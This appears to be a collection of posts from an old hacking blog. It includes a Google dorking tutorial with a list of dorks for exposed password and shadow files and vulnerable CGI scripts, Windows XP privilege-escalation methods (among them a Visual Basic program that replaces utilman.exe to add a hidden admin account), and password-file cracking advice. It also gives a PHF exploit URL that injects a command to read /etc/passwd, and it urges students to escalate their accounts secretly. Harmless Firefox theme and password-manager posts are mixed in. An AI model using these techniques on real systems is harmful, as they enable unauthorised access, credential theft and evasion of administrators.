This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Using google to hack, crack, and just plain find what you need

Before we begin, I strongly recommend reading through http://www-db.stanford.edu/~backrub/google.html
#This article will help you understand the inner workings of a search engine (if you're not already ereet)
#I added a copy of this article to the end of this text, so just scroll down a little ways :)


What is this tutorial about?

-It's about using google to get the information you need, fast

Why should I read it?

-Because at the end of this tutorial, you'll be able to use google to find WHATEVER you need!

Why are you writing it?

-Because all of the ereet programmers at irc.smart-dev.com/irc.zoite.net are tired of people asking us questions,
when they could just ask lord google

Do I need to gather any tools for this tutorial?

-A web browser (i.e. lynx, mozilla), and confidence in the fact that you aren't inept



Now the 'tutorial'

Google is the shit. You can find virtually ANYTHING you want with it. "©2003 Google - Searching 3,083,324,652 web
pages" as of Sunday, February 16, 2003! I use google for pretty much anything. Any question you have can be answered
90% of the time in the first 20 results, if you search properly. In the next few sections I will be going over some
basic/advanced/UBER COOL techniques for searching.


I.Getting started

-Open your web browser, and goto www.google.com (if it isn't your homepage, which it should be!)
-Now, click on preferences- Most of this should be fine preset, but make sure you fill in the "do not filter my
search results," and select 100 results per page from the drop down menu, then fill in the last bubble (if thats
your thing). Click save preferences (note: they will only be saved if you have cookies enabled).

-Now that you have everything set up, let's see everything google has to offer (because google has a slew of useful
tools). First theres the web search, which is the topic of this article. After that theres the image search, which
is pretty useful if you want to find a picture of someone you know (I will go into detail later on), or if you just
wannt to find some free porn! Sicko. Next up: Groups. I LOVE this feature! You can search year, and years, and years,
of posts on USENET discussion boards. I have gotten SO much valuable information (mostly stuff to help me crack my
target) just by using this feature. I will also go indepth on this feature as well. Next to last: Directory searching.
This is pretty useful if you want to find information on a TOPIC. For instance if you wanted to do a biology project
on genetic disorders you would use this. Last up: News. This is a fairly new feature, added a few months ago. It
tells you how recent articles are (by the hour, pretty cool!). You can look at world news on World, U.S., buisness,
Science/Tech, Sports, Entertainment, and Health.

II.Google for Web searches
(BASIC)
-Well, you've got a broad sense of what google does, so lets get right into the specifics! I can hardly wait!

A. Deciding on keywords
-Try specific keywords first (i.e. search for elephant as opposed to animals)
-Make searches as specific as you can.
-Keep searches as specific as you can!
+Note: The more specific you want your search to be, the more words you need, and you'll get less results
(this can be a bad or good thing)

B. How it works
-When you search for hacker tutorials, google interprets it as hacker AND tutorials, so it returns only pages
with all of the keywords you entered by default
-When you search for tutorials for hackers, the word for is omitted, as are all other words like if, a, who,
what, when, where, and how. If you need to include a common word in your search phrase use a '+' before the
common word. Your search is now tutorials +for hackers.
+note: google is not case sensitive
+note: google does not use wildcards (searching for googl* will not return google)
(ADVANCED)

A. ""'s
-Using quotations is probably the most important part of an advanced search. You can really control the
results of your search using quotes. When you use quotes, all of your results will contain the exact phrase.
So if you were to search "Tutorial for hacking" Google would search 3,083,324,652 web sites for that exact
phrase.
-You can put part of your search in quotes, and the other a regular search. For instance, if I wanted to find
out what pages my friend that just happens to be a girl is on the internet, I would search "Firstname
Lastname" Thomas Dale. This would search for the exact phrase "her name" and then it would search for any
pages that contained the words Thomas Dale(Thomas Dale is my highschool).

+Find me! My name is alejandro(alex), and i'm part of the smart-dev community ;)
B. "-"'s

-Using '-' to omit results. Perhaps you're searching for a new type of password file, for a new webserver.
The password file is called passwerd.db, but when you do a simple in title search(just keep reading, you'll
understand later) all you get is a bunch of results that turn out to be a config file that has syntax
referring to passwerd.db. Lets say this config file is named config(go figure). Omit this from your search
simply by searching searchstring -config and viola you get a list of sites that display passwerd.db to the
public! You can also use the boolean term NOT.
(HACKING/CRACKING)

Yay! This is why I wrote this article!

INTRO TO HACKING/CRACKIGN WITH GOOGLE
-Many of you probably already know this, but you can hack/crack with google. I use it in 100% of the
hacks/cracks I perform. You can use google to help you hack/crack in a few different ways. I will discuss
these in the sections below ("no shit!")

A. intitle:
-This is a built in function in google that searches for your phrase in the title of a web page. The
title of a webpage is in the upper left of your current window. (you should see google.txt if someone
hasnt changed the name). This is useful if you want to find something VERY specific.
-examples: intitle:"billing" intitle:"payments" intitle:"passwd"
B. Directory Indexing

-One GREAT trick is to find sites that allow directory indexing. This can be done by searching
intitle:"index of" phrase. Your mind should now be about to explode with the possibilities this could
hold. If it doesn't, that's ok, because if you look at the end of this article you'll see i've
provided you with an uber cool list! Here are some basic phrases you can use: intitle:"index of"
"passwd" OR "passwd.txt" OR "AutismIsSoCool!". This searches for files named passwd or if that isnt
found, searches for passwd.txt or if that isnt found searches for AutismIsCool! Think original, and
you can come up with the coolest stuff! I'm not just talking about passwords... I'm talking about
warez, passwords, and even credit card numbers!!! (although to be honest it's not easy ;))

C. allinurl:
-Guess what this does! Basically I use this when I want to find a piece of software. When i'm at school we
have some stupid web site filter, that doesn't allow me to download AIM (AOL instant messenger uhhh tm) so
basically I just do a search for allinurl:"aim.exe" and I get to take my pick! This can also be used for
passwd, passwd.txt, and so on

D. Cache
-Perhaps you have been searching for intitle:"index of" etc/shadow, and you see what looks like a valid
shadow file in your results list, but you cant access it, because you arent root, or whatever. Well thanks to
google cache, it may be possible for you to view this file. Just click the little chached link under the
result!
+note: this doesnt work 100% of the time

E. Collecting info on your target

-You can use google to find all sorts of juicy information about your target. For instance, if you wanted to
know what @target.com addresses were on the site, just search "@target.com" site:www.target.com. You should
get a nice list of email addresses. (these can double as usernames for other things besides emails)
-GOOGLE GROUPS is a great way to get info on a target. Just click the groups tab and search for @target.com,
and you will see everything anyone from your target has EVER posted on a usenet board! This is a real good
one!

THATS IT! THAT'S THE WHOLE TUTORIAL!

Summary: Well I hope you learned something from this article. Wether you were a complete noob, an advanced internet user,
or an ereet hacker, I tried to teach you all something. Remember- don't ever give up after only a few minutes of
searching... You'll get the right combination of keywords sooner or later. Just try to imagine what words you would use
for the item you are trying to find ;). Now GO! I officialy deem you "Google lord!"

(APPENDIX A)

-This is a list of all the cool searches I've found over the years
-PLEASE add to it! add your searches, and put the date you added it next to the search, then upload it somewhere

allinurl: winnt/system32/ (get cmd.exe)
intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart **GOOD ONE!

-and hey! wouldnt you know it! someone has already taken care of the rest of this appendix for me! Thanks Johnny!

/*/*/*The following list was taken from johnny.ihackstuff.com*\*\*\
_vti_inf.html
service.pwd
users.pwd
authors.pwd
administrators.pwd
shtml.dll
shtml.exe
fpcount.exe
default.asp
showcode.asp
sendmail.cfm
getFile.cfm
imagemap.exe
test.bat
msadcs.dll
htimage.exe
counter.exe
browser.inc
hello.bat
default.asp\\
dvwssr.dll
cart32.exe
add.exe
index.jsp
SessionServlet
shtml.dll
index.cfm
page.cfm
shtml.exe
web_store.cgi
shop.cgi
upload.asp
default.asp
pbserver.dll
phf
test-cgi
finger
Count.cgi
jj
php.cgi
php
nph-test-cgi
handler
webdist.cgi
webgais
websendmail
faxsurvey
htmlscript
perl.exe
wwwboard.pl
www-sql
view-source
campas
aglimpse
glimpse
man.sh
AT-admin.cgi
AT-generate.cgi
filemail.pl
maillist.pl
info2www
files.pl
bnbform.cgi
survey.cgi
classifieds.cgi
wrap
cgiwrap
edit.pl
perl
names.nsf
webgais
dumpenv.pl
test.cgi
submit.cgi
guestbook.cgi
guestbook.pl
cachemgr.cgi
responder.cgi
perlshop.cgi
query
w3-msql
plusmail
htsearch
infosrch.cgi
publisher
ultraboard.cgi
db.cgi
formmail.cgi
allmanage.pl
ssi
adpassword.txt
redirect.cgi
cvsweb.cgi
login.jsp
dbconnect.inc
admin
htgrep
wais.pl
amadmin.pl
subscribe.pl
news.cgi
auctionweaver.pl
.htpasswd
acid_main.php
access.log
log.htm
log.html
log.txt
logfile
logfile.htm
logfile.html
logfile.txt
logger.html
stat.htm
stats.htm
stats.html
stats.txt
webaccess.htm
wwwstats.html
source.asp
perl
mailto.cgi
YaBB.pl
mailform.pl
cached_feed.cgi
global.cgi
Search.pl
build.cgi
common.php
show
global.inc
ad.cgi
WSFTP.LOG
index.html~
index.php~
index.html.bak
index.php.bak
print.cgi
register.cgi
webdriver
bbs_forum.cgi
mysql.class
sendmail.inc
CrazyWWWBoard.cgi
search.pl
way-board.cgi
webpage.cgi
pwd.dat
adcycle
post-query
help.cgi




Emergency Data Destruction With Boot and Nuke

Need to securely erase any hard drives hooked to your PC automatically when the FBI knocks on the door? Lets hope that isn’t the case, but if so Darik’s Boot and Nuke is the perfect solution. Darik’s Boot and Nuke is a ’self contained floppy disc’ that securely wipes all hard drives detected on the local PC.

From the README:

1.0 About Darik’s Boot and Nuke
——————————–

Darik’s Boot and Nuke (”DBAN”) is a self-contained boot floppy that securely
wipes the hard disks of most computers. DBAN will automatically and completely
delete the contents of any hard disk that it can detect, which makes it an
appropriate utility for bulk or emergency data destruction.

Download the exe and write the image to a floppy. Just make sure your kids or little brother don’t accidentally get a hold of the disk a boot from it!

Linux users can also unzip the exe and use dd to transfer the image to a floppy (see the README).

I know a lot of you know longer have floppy drives - there are more convenient DBAN CD images available.

How to automatically wipe all hard drives

WARNING: THIS WILL PERMANENTLY ERASE ALL DATA ON ALL HARD DRIVE HOOKED TO THE PC!!!

  1. Boot from the DBAN floppy or CD image.
  2. Enter ‘autonuke’ at the boot prompt.

And it is as simple as that! Hope you enjoyed and if you have any other methods of securely wiping your hard drives on the fly let us know in the comments!

Firefox Adons

Well seen as though we were talking about breaking passwords, here’s a tool for Firefox to help you manage your more secure passwords.

Better security without bursting your brain

Password Hasher is a Firefox security extension for generating site-specific strong passwords from one (or a few) master key(s).

What good security practice demands:

      Strong passwords that are hard to guess.
      Different passwords at each site.
      Periodically changing existing passwords.
Why you probably aren’t practicing good security:

      Strong passwords are difficult to remember.
      Juggling a multitude of passwords is a pain.
      Updating passwords compounds the memorization problem.
How Password Hasher helps:

  • Strong passwords are automatically generated.

  • The same master key produces different passwords at many sites.

  • You can quickly upgrade passwords by “bumping” the site tag.

  • You can upgrade the master key without updating all sites at once.

  • It supports different length passwords.

  • It supports special requirements, such as digit and punctuation characters.

  • All data is saved to the browser’s secure password database.

You can download Password Hasher here:

passhash-1.0.5.xpi

firefox themes great collection

Emulators

    FOXSCAPE
FOXSCAPE - If you long for the days when Netscape was a browser and not social bookmarking, download this theme immediately.

    Office 03
Office 03 - Give your browser that Microsoft Office 2003 look it’s beencraving.

    Outlook 2003
Outlook 2003 Blue - Looks like the 2003 edition of Outlook. Also comes in green and silver.

Miscellaneous

    Abstract Classic
Abstract Classic - Angular looking icons.

    Baby Blue
Baby Blue/ BB - The boyish blue version of Pink Paula.

    Bible Fox
Bible Fox - Gives your Firefox a Christian make over.

    Glowy Green
Glowy Green - Bit of a fantasy feel, also available in gold, red, wine and blue.

    Littlefox
Littlefox for Firefox - Designed to take up as little screen real estate as possible.

    MidnightFox
MidnightFox - A dark theme with brightly colored buttons.

    Old Factory
OldFactory Black - Give your browser a retro feeling with toggles and switches

    PimpZilla
PimpZilla - You’ve pimped out your ride, why not do the same with your web browser?

    Pink Paula
Pink Paula / PP2 - If you just don’t have enough pink in your life, this is the solution.

    RedShift
RedShift V2 Beta - Dark theme with red highlights.

    Scribblies Brite
Scribblies Brite - Watch the juggler do his thing while pages load. Fun theme for kids.

    ShadowThunderII
ShadowThunder II Sunbeam - Bright yellow with colorful icons.

    Walnut
Walnut for Firefox - Ever wondered what the web would look like with a wooden take? This is the theme you need.

Operating System Integration

    iFox Smooth
iFox Smooth - A very basic Mac looking theme.

    Macfox II
Macfox II - Give your Firefox a Mac OS feeling no matter what computer you’re on.

    Metal Lion
Metal Lion - Vista - The popular Metal Lion theme updated to integrate more with the Vista feel.

    Netscape Windows 3.1
Netscape Windows 3.1 - Harken back to Netscape 3 while running it on Windows 3.1.

    Ubuntu Human
Ubuntu Human Theme - Makes your Firefox look like a part of yoru Ubuntu Linux install.

    Ubuntu Tango
Ubuntu Tango Theme - Another one for the Linux enthusiasts out there.

    Vista-Aero
Vista-aero - If you like the power of Firefox, but the look of Internet Explorer 7, this is the theme for you.

Themed

    Halloff
HalloFF - A mixture of Halloween and The Nightmare Before Christmas.

    Halloween
Halloween - Haunted houses, black cats, flying witches for you to browse with.

    Lineage 2
Lineage 2 - Based on the game of Lineage 2.

    NASA Night Launch
NASA Night Launch - Can even style numerous extensions.

    Red Cats
Red Cats (green flavor) - A theme for the cat lovers, also available in blue.

    The Simpsons
The Simpsons - Made for the German release of the movi, but works perfectly fine here.

    Unreal
tuxof - Based on Unreal Tournament 2004.

    Xmas Light
X-Mas (Light) - Perfect to celebrate Christmas any time of year.

Aero Fox - All black and blue, kind of like how I ended up after the last Internet Explorer 7 fan club meeting I attended.

2
NASA Night Launch - Want to shoot off to the stars?  Well you might not be able to go to space yourself, but why should you?  Bring space to you!

1
Aquatint Black Gloss - Another shinny black and blue theme with icons so glossy I can see myself in them.

2
PitchDark for Fx - It is so dark, it is pitch dark!  No wait a minute, isn’t that suppose to be pitch black?  Oh no wait a minute, there is the pun.

pitchdark
Just Black - Hey, it is just black - got it?  Nothing more to see here, keep moving along my Firefox flock of followers.

1
In The Dark - If you want something darker than pitch dark, then you need to go in the dark.  Somebody turned the lights out on my Firefox!

3
DarkVista - Represent the Microsoft friendly theme the way it was suppose to be done… with the back and forward reminding me more of Darth Vader’s helmet.

1
Gradient iCool - Hey, iCool… are uCool?  Black and blue again (seeing a repeating fashion here) but just different enough to keep it interesting.

1
Office 2007 Black - Enjoy the look of Office 2007, but want it black and as a Firefox 3 theme?  For all 6 of you out there - I give you this.

1
Full Flat Absolute Black - Simple 2-bit icons, black background and yeah, you can’t get any darker than this.

flatblack
Which theme from the dark side is your favorite?  Why do we love or hate the

Getting Administrator Privilages in xp

Method 1:-

- Open Notepad -> type "net localgroup Administrator yourusername/add" (without the quotes)
- Make the admin login to the computer -> make him to run the file -> Congrats you are admin


Method No. 2

- Login to your XP box as a non-priviliged user.
- Open up a command window (run cmd.exe)
- In that command window, have the system schedule launch another command window.
- type at 20:00 /intereactive "cmd.exe" -> in the command prompt -> it will launch a interactive cmd with system priviliages at 20:00 -> set the time just ahead of your clock
- When new window opens, kill explorer.exe in task manager.
- open explorer.exe
- Congrats, you're now running as the system user - you have more power than 'Administrator'!
- Now you can make yourself administrator by adding your name to Administrators group
- Type this in command prompt -> net localgroup Administrator /add


Method 3:-

- Boot in the Safe mode in XP
- Most of the times people have no password for the real Administrator account , they usually give admin privilages to another account
- Get in the administrator account


Method 4:-
- Boot from live CD of a linux/unix distro
-


Other methods

Exploits :- like


Registry Changes :-

1. Run Registry Editor (Regedt32.exe).

2. Perform the following steps on each of the registry keys
identified above:

A. On the Security menu, click Permissions.

B. Click "Replace Permissions on Existing Subkeys" so that it
is

selected.

C. Click Everyone, change the Type Of Access to Read, and then
click OK.

3. Exit Registry Editor.

from :- http://insecure.org/sploits/NT.startup_programs.bad_registry_perms.html



Resetting the admin password :-
With Boot Disk


With Windows XP Boot CD

1. Place in windows XP CD and start your computer (it?s assumed here that your XP CD is bootable ? as it should be - and that you have your bios set to boot from CD)

2. Keep your eye on the screen messages for booting to your cd usually it will be ?Press any key to boot from cd?

3. Begin windows Repair process.

4. During the reboot, do not make the mistake of ?pressing any key? to boot from the CD again!

5. Keep your eye on the lower left hand side of the screen and when you see the Installing Devices progress bar, press SHIFT + F10. This is the security hole! A command console will now open up giving you the potential for wide access to your system.

From here you can run any windows command and you?ll have full administrator access. To reset password you can use ether of two ways:



1) Run NUSRMGR.CPL to get graphical interface

2) Run Compmgmt.msc to get Computer Management console. From there use Local User and Groups->Users



another method :-
Run Apps with admin privilages

try runnigh your code with Administrator privilages with command "runas"

eg :- runas /env /user:Administrator "c:WINDOWSNOTEPAD.EXE"

it will run notepad in Administrator privilages , similarly run your code in admin privilages


1 .use sudowin. This is an open source project distributed under the BSD License (which is a very permissive license ? an example about how permissive it is is the fact that for a long time parts of the Windows network stack were taken from an externally developed source code licensed under this license) written in .NET 2.0. What it does is that it gives administrative credentials to the programs you want to, but they will still run with your profile (meaning that they will see the same registry, the same desktop / my documents directory and so on). An other important differnce is that you must enter your password to elevate privileges. It also contains both a GUI and a command line component. To install it, take the following steps:
go to the website and download it (in a rather confusing move the download link is where it displays the version number, towards the upper middle of the page, currently it says 0.1.1-r95). If you didn't download anything from sourceforge.net until now, it will ask you to select a mirror.

2 .You'll need the .NET framework 2.0. You can download it from the microsoft site if you don't already have it (be sure to download the redistributable package not the software development kit). Here is a direct link if you are running a 32 bit Intel or AMD machine. If you already have the .NET framework 1.0 or 1.1, it will prompt you during the installation and offer you the possibility to download and install the 2.0 version without interrupting the installation.

3 . Install the software. Remember to do this from an account with administrative privileges (you can use the methods described earlier to run the installation with enough privileges).

4. Using a notepad with administrative privileges edit the sudoers.xml file located in the Server subdirectory of the install directory (this is Crazzrogram Filessudowin by default or Crazzrogram Files (x86)sudowin on 64 bit systems). Go to the users section and add the users you want to have sudo capabilities (remember to enter the names in the format of . If you are a home user, you can find out your complete name by entering whoami at the command prompt). Now go towards the end and enter the commands which you want to be able to run with elevated privileges. Also look around the file and change other settings to fir your need. Save the file.

5. Use the command runas /user:Administrator "cmd /c start lusrmgr.msc" (assuming that Administrator is a user with administrative privileges to which you know the password) to display the user management console (anyone else finds the name funny?). Go to each user you want to be able to perform sudo and add them to the Sudoers group which was created by sudowin during the installation (you can do this by right clicking on them, clicking properties, going to the "Member of" tab, clicking Add, writing Sudoers and clicking Ok).

6. Use the command runas /user:Administrator "cmd /c start services.msc", find the sudowin service and restart it.


Haven't tested it myself taken from :- http://hype-free.blogspot.com/2006/09/non-hacking-tutorial-on-elevating.html

One more Method:-

OK Here it is, Please post some input on what you think. Also im trying to figure out a better way to gain Access to the NTFS partition. Any input welcomed!

Gain SYSTEM/Administrative Access to Windows XP/2000

I will explain how to gain Local Administrative rights to Windows XP/2000 computer without removing or cracking a Users password. In order for this

to work the Computer must have a CD-ROM drive, or other bootable device other then a harddrive.

(Im stoned and its 3:15a.m. so i hope this makes sense)
Overview:
Windows XP/2000 allows you to run a program with System level privileges before logging on. The name of the program is Utility Manager. It is

located at C:Windowssystem32utilman.exe for windows XP and C:WINNTSystem32utilman.exe for windows 2000. So all you have to do is make

your own program that creates an administrative account. The program that you create has to have a filename of Utilman.exe in order to work.

If the filesystem on the computer is FAT32 then this process is very simple and only takes a second. If the Computer uses the NTFS filesystem this

will take a few minutes depending on how fast the PC is.


First We need to make the program
I used Visual Basic 6, here is my source code that i used to create the administrative account:


#################################START###############################
Private Sub Form_Load()
Shell "net user NewAdmin " & """""" & " /add", vbHide
Pause (1)
Shell "net localgroup administrators NewAdmin /add", vbHide
Pause (1)
msgbox "Added Administrative User",16,"Hacked XP"
End
End Sub

Sub Pause(interval)
'Pauses execution
Current = Timer
Do While Timer - Current < Val(interval)
DoEvents
Loop
End Sub

'#################################END###############################

Compile this with the filename of Utilman.exe this is very important! What this program does is create a User named NewAdmin with a blank

password and then adds them to the Administrators Group.

Ok Now that we've made the program lets move on...

FAT32
1. Create a bootable floppy :: http://1gighost.net/keywest/boot98sc.exe
2. Add the newly made Utilman.exe to the Floppy
3. Restart the computer with the floppy in it
4. After DOS loads type C: and press enter.
5. If it changes from A:/> to C:/> then your doing good
6. use this command: Copy A:utilman.exe C:windowssystem32utilman.exe press Y to overwrite the exsisting file
7. Restart the computer without the floppy in it
8. When it gets to the Login Screen Press the Windows Key + U
9. Restart the computer if FastUser Switching is enabled (The Graphical Login with the picture next to the login name, XP Only) if not enabled skip to Step 10

9a. After restarting you should see a new user in the list named NewAdmin, click on this account and you just gained Administrative access to your

PC.
10. After pressing Windows Key + U then type in the username NewAdmin and push Enter. Thats It you now have administrative access to

your PC.


NTFS
Use a Windows 2000 Setup CD to gain access to the NTFS partition through the recovery console. From the recovery console you can copy over the hacked Utilman.exe. Once in the recovery console follow the same instructions as above from step 6. After copying over the file restart your computer by typing exit or pusing ALT CTRL DEL. Remove the Windows 2000 CD. When windows loads to the choose user screen simply push Windows Key + U. After pushing the Windows Key + U you should see a message that says "Added Administrative User", restart the computer one last time then choose the NewAdmin user account. This will have Administrative Privileges. It works ive done it and i hope you all enjoy this nice little hack ! ! ! (If your trying to gain SYSTEM level access your can replace the UTILMAN.exe to open a Command Prompt)

LOL i hope that made sense

Getting the Password File Through FTP

Well one of the easiest ways of getting superuser access is through
anonymous ftp access into a webpage. First you need learn a little about
the password file...

root:User:d7Bdg:1n2HG2:1127:20:Superuser
TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh
BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh

This is an example of a regular encrypted password file. The Superuser is
the part that gives you root. That's the main part of the file.

root:x:0:1:Superuser:/:
ftp:x:202:102:Anonymous ftp:/u1/ftp:
ftpadmin:x:203:102:ftp Administrator:/u1/ftp

This is another example of a password file, only this one has one little
difference, it's shadowed. Shadowed password files don't let you view or
copy the actual encrypted password. This causes problems for the password
cracker and dictionary maker(both explained later in the text). Below is
another example of a shadowed password file:

root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false

Shadowed password files have an "x" in the place of a password or sometimes
they are disguised as an * as well.

Now that you know a little more about what the actual password file looks
like you should be able to identify a normal encrypted password from a shadowed
password file. We can now go on to talk about how to crack it.

Cracking a password file isn't as complicated as it would seem, although the
files vary from system to system.

1.The first step that you would take is to download or copy the file.

2. The second step is to find a password cracker and a dictionary maker. Although it's nearly impossible to find a good cracker there are a few ok ones out there. I recommend that you look for Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper. Now for a dictionary maker or a dictionary file... When you start a cracking program you will be asked to find the the password file. That's where a dictionary maker comes in. You can download one from nearly every hacker page on the net. A dictionary maker finds all the possible letter combinations with the alphabet that you choose(ASCII, caps, lowercase, and numeric letters may also be added) .

3. You then start up the cracker and follow the directions that it gives you.


The PHF Technique:

Well I wasn't sure if I should include this section due to the fact that
everybody already knows it and most servers have already found out about
the bug and fixed it. But still i thought that you should know about it. So I decided to include it.

The phf technique is by far the easiest way of getting a password file
(although it doesn't work 95% of the time). But to do the phf all you do
is open a browser and type in the following link:

http://webpage_goes_here/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

You replace the webpage_goes_here with the domain. So if you were trying to
get the pw file for www.webpage.com you would type:

http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

and that's it! You just sit back and copy the file(if it works)

How To Change a Windows XP Limited User Account Into a Admin acc

PCLoginNow is an easy-to-use tool to reset local administrator and other accounts passwords on Windows system. No need to reinstall the system. It resets Windows passwords and Windows security settings instantly. All version of Windows are completely supported. It’s an incredible CD for Home users and Businesses. And most of all, it’s the most popular and safe solution for removing your Windows password until now.

Besides the abilities of resetting passwords, PCLoginNow can also help you maintain, change accounts policy setting and properties. You can easily upgrades an general account to administrator level, lock or unlock those accounts you don’t need anymore, And moreover, all of these are done without booting your tedious, time-consuming Windows System.

The most powerful feature PCLoginNow have is to support Syskey. SYSKEY is an optional feature since Windows NT 4.0 SP3. It is meant to protect against offline password cracking attacks so that the SAM database would still be secure even if someone had a copy of it. Even though the system registry is protected by Syskey, PCLoginNow can easily bypass this mechanism and reset the Windows passwords.

Only 4 simple steps are required to turn a limited user account into administrator.
1. Download PCLoginNow.

2. Burn the ISO image to a CD/DVD.

3. Boot up the computer with the CD/DVD.

4. Click the Next button when you see the message that says “PC Login Now! is ready to start, please click NEXT to continue…”

5. Select the Windows system that is found by PC Login Now program.

6. Select the user account that you want to edit, check “is Administrator” and click Next.
Change Limit User account to Administrator

7. Reboot and the user is now a local administrator of the computer.

I find this tool amazing because it can turn a user from zero into hero. I understand that some students are adventurous and would like to install or configure the system the way they like it but they cannot do it with a limited user account. Hence, they find a way to secretly upgrade their limited account to a local computer administrator and now they can do whatever they want. We cannot set a BIOS password because if the students entered the wrong security password for 3 times, it’ll be locked and we’ll have to contact HP support and get them to reset it.